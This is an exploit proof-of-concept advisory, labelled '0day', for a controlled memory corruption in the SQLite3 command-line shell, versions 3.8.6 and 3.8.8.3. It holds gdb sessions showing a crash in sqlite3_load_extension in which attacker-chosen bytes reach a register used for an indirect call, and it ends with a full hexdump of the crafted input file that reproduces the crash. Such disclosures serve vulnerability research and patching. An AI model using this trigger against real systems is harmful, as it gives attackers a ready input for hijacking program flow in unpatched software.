|
# Exploit Title: SQLite3 controlled memory corruption PoC (0day)
# Date: [date]
# Exploit Author: Andras Kabai
# Vendor Homepage: http://www.sqlite.org/
# Software Link: http://www.sqlite.org/download.html
# Version: 3.8.6, 3.8.8.3
# Tested on: Ubuntu 14.10, 64 bit 3.8.6 (latest available package), 3.8.8.3 (built from the latest source code)
Using a crafted input (e.g. from a malicious file via “-init” parameter or directly given to the std input of the program) it is possible to trigger a memory corruption vulnerability in the most recent version of SQLite3. The memory corruption could be controlled, therefore the program flow could be manipulated by the attacker.
The following sections demonstrates the attack against the apt-get installed installed and updated sqlite3 and against a newer version that is built from source.
====
andrew@ubufuzzx6401:~/issues/sqlite$ which sqlite3
/usr/bin/sqlite3
andrew@ubufuzzx6401:~/issues/sqlite$ /usr/bin/sqlite3 -version
3.8.6 2014-08-15 11:46:33 9491ba7d738528f168657adb43a198238abde19e
andrew@ubufuzzx6401:~/issues/sqlite$ gdb64 /usr/bin/sqlite3
GNU gdb (Ubuntu 7.8-1ubuntu4) 7.8.0.20141001-cvs
Copyright (C) 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from /usr/bin/sqlite3...(no debugging symbols found)...done.
(gdb) set disassembly-flavor intel
(gdb) set args < sqlitepoc.txt
(gdb) r
Starting program: /usr/bin/sqlite3 < sqlitepoc.txt
warning: the debug information found in "/lib64/ld-2.19.so" does not match "/lib64/ld-linux-x86-64.so.2" (CRC mismatch).
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Usage: .trace FILE|off
Error: near line 4: near "whatever": syntax error
Usage: .trace FILE|off
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7ba06a0 in sqlite3_load_extension () from /usr/lib/x86_64-linux-gnu/libsqlite3.so.0
(gdb) i r
rax 0x138 312
rbx 0x41414141424242 18367622009733698
rcx 0x7fffffffb590 140737488336272
rdx 0x0 0
rsi 0x555555779b43 93824994483011
rdi 0x41414141424242 18367622009733698
rbp 0x555555779b43 0x555555779b43
rsp 0x7fffffffb4c0 0x7fffffffb4c0
r8 0x555555779b41 93824994483009
r9 0x6c 108
r10 0x0 0
r11 0x0 0
r12 0x555555779b48 93824994483016
r13 0x7fffffffb590 140737488336272
r14 0x555555779b40 93824994483008
r15 0x2 2
rip 0x7ffff7ba06a0 0x7ffff7ba06a0 <sqlite3_load_extension+736>
eflags 0x10246 [ PF ZF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) disas $rip,+10
Dump of assembler code from 0x7ffff7ba06a0 to 0x7ffff7ba06aa:
=> 0x00007ffff7ba06a0 <sqlite3_load_extension+736>: call QWORD PTR [rbx+0x48]
0x00007ffff7ba06a3 <sqlite3_load_extension+739>: mov r15,rax
0x00007ffff7ba06a6 <sqlite3_load_extension+742>: lea rax,[rip+0x12bc1] # 0x7ffff7bb326e
End of assembler dump.
===
andrew@ubufuzzx6401:~/tmp/build/sqlite-autoconf-3080803/.libs$ ./lt-sqlite3 -version
3.8.8.3 2015-02-25 13:29:11 9d6c1880fb75660bbabd693175579529785f8a6b
andrew@ubufuzzx6401:~/tmp/build/sqlite-autoconf-3080803/.libs$ gdb64 ./lt-sqlite3
GNU gdb (Ubuntu 7.8-1ubuntu4) 7.8.0.20141001-cvs
Copyright (C) 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./lt-sqlite3...done.
(gdb) set disassembly-flavor intel
(gdb) set args < /home/andrew/issues/sqlite/sqlitepoc.txt
(gdb) r
Starting program: /home/andrew/tmp/build/sqlite-autoconf-3080803/.libs/lt-sqlite3 < /home/andrew/issues/sqlite/sqlitepoc.txt
warning: the debug information found in "/lib64/ld-2.19.so" does not match "/lib64/ld-linux-x86-64.so.2" (CRC mismatch).
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Usage: .trace FILE|off
Error: near line 4: near "whatever": syntax error
Usage: .trace FILE|off
Program received signal SIGSEGV, Segmentation fault.
sqlite3LoadExtension (pzErrMsg=0x7fffffffb510, zProc=0x0, zFile=0x6261c3 "CCCCBBBBAAAA", db=0x6261c8) at sqlite3.c:36169
36169 }
(gdb) i r
rax 0x138 312
rbx 0x41414141424242 18367622009733698
rcx 0x7fffffffb510 140737488336144
rdx 0x0 0
rsi 0x6261c3 6447555
rdi 0x41414141424242 18367622009733698
rbp 0x6261c3 0x6261c3
rsp 0x7fffffffb440 0x7fffffffb440
r8 0x6261c1 6447553
r9 0x6c 108
r10 0x7fffffffb270 140737488335472
r11 0x7ffff7b5ae50 140737349267024
r12 0x6261c8 6447560
r13 0x7fffffffb510 140737488336144
r14 0x6261c0 6447552
r15 0x2 2
rip 0x7ffff7b5b130 0x7ffff7b5b130 <sqlite3_load_extension+736>
eflags 0x10246 [ PF ZF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) disas $rip,+10
Dump of assembler code from 0x7ffff7b5b130 to 0x7ffff7b5b13a:
=> 0x00007ffff7b5b130 <sqlite3_load_extension+736>: call QWORD PTR [rbx+0x48]
0x00007ffff7b5b133 <sqlite3_load_extension+739>: mov r15,rax
0x00007ffff7b5b136 <sqlite3_load_extension+742>: lea rax,[rip+0x587d8] # 0x7ffff7bb3915
End of assembler dump.
====
andrew@ubufuzzx6401:~/issues/sqlite$ hexdump -C sqlitepoc.txt
00000000 3b 0a 2e 74 20 78 0a 2e 74 0a 77 68 61 74 65 76 |;..t x..t.whatev|
00000010 65 72 00 0a 3b 0a 2e 74 0a 2e 6f 70 0a 2e 6c 20 |er..;..t..op..l |
00000020 43 43 43 43 42 42 42 42 41 41 41 41 0a |CCCCBBBBAAAA.|
0000002d
|